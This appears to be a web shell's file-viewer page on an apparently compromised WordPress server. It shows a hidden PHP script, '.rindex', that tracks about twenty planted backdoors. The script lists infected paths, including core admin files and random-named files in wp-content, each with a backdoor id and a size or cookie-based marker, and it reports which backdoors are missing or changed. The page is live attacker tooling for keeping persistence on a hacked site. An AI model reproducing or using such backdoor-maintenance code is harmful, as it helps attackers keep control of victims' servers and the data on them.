HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux ismtj.co 5.15.0-177-generic #187-Ubuntu SMP Sat Apr 11 22:54:33 UTC 2026 x86_64
User: sarbon.tj (1759)
PHP: 8.1.2-1ubuntu2.23
Disabled: NONE
Upload Files
File: /var/www/sarbon.tj/data/tmp/.rindex
<?php   $r = '/var/www/sarbon.tj/data/www/sarbon.tj'; $x = ["/index.php"=>"bd@@290232235@@$_COOKIE[6",
"/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@290440540@@84",
"/wp-admin/setup-config.php"=>"bd@@320345675@@64",
"/wp-admin/options-permalink.php"=>"bd@@320349022@@60",
"/wp-includes/blocks/categories/categories/index.php"=>"bd@@320348363@@$_COOKIE[6",
"/wp-admin/edit.php"=>"bd@@320341851@@99",
"/wp-admin/admin-header.php"=>"bd@@323629444@@25",
"/view.topics.php"=>"bd@@320342097@@33",
"/index.php"=>"bd@@310618605@@22243",
"/wp-content/4f7ad501.php"=>"bd@@320348383@@service_registry",
"/wp-content/3172813b.php"=>"bd@@320345632@@auth_exception_handler",
"/class.report.php"=>"bd@@320343846@@535",
"/wp-admin/theme-install.php"=>"bd@@320345660@@_COOKIE[3]",
"/wp-admin/widgets-form-blocks.php"=>"bd@@320344922@@$_COOKIE[-",
"/wp-admin/admin-post.php"=>"bd@@320341974@@LHvjvo",
"/wp-content/933af11c.php"=>"bd@@320343017@@75",
"/wp-includes/post.php"=>"bd@@320348933@@$_COOKIE[-",
"/wp-admin/user-edit.php"=>"bd@@320342037@@auth_exception_handler",
"/wp-admin/site-health-info.php"=>"bd@@320345655@@bJUSXd",
"/startup.php"=>"bd@@323638841@@36",
"/wp-admin/contribute.media.php"=>"bd@@320347769@@536"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');